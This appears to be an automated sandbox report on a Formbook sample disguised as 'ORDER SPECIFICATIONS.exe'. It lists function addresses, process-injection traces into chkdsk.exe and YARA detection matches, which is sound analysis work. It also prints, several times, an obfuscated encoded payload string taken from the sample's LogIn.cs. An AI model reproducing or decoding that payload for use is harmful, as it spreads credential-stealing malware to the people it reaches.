            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015928EC
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DB090
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015920A8
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01592B28
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015803DA
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158DBD2
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FEBB0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015922AE
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01591D55
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01592D07
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C0D20
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015925DD
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DD5E0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158D466
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D841F
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159DFCE
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01591FF1
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158D616
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E6E30
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01592EF7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05611D55
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0554F900
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05540D20
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05564120
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555D5E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05572581
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555841F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05601002
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0555B090
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0557EBB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05566E30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBCB93
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBBB65
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBB496
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA8C0A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA8C50
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA2D90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA2D8D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBC515
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BBC509
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BA2FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0554B150 appears 32 times
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: String function: 014CB150 appears 45 times
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263259287.0000000008E10000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261776702.00000000071D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261503180.0000000007010000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000000.230240287.0000000000718000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254790320.0000000002B49000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmpBinary or memory string: originalfilename vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000004.00000000.251795552.00000000001D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.299165468.000000000174F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.297762999.0000000000B38000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298398176.0000000001486000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exeBinary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
            Source: ORDER SPECIFICATIONS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: ORDER SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: LvZiFDk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: ORDER SPECIFICATIONS.exe, LogIn.csBase64 encoded string: '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
            Source: LvZiFDk.exe.0.dr, LogIn.csBase64 encoded string: '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
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJ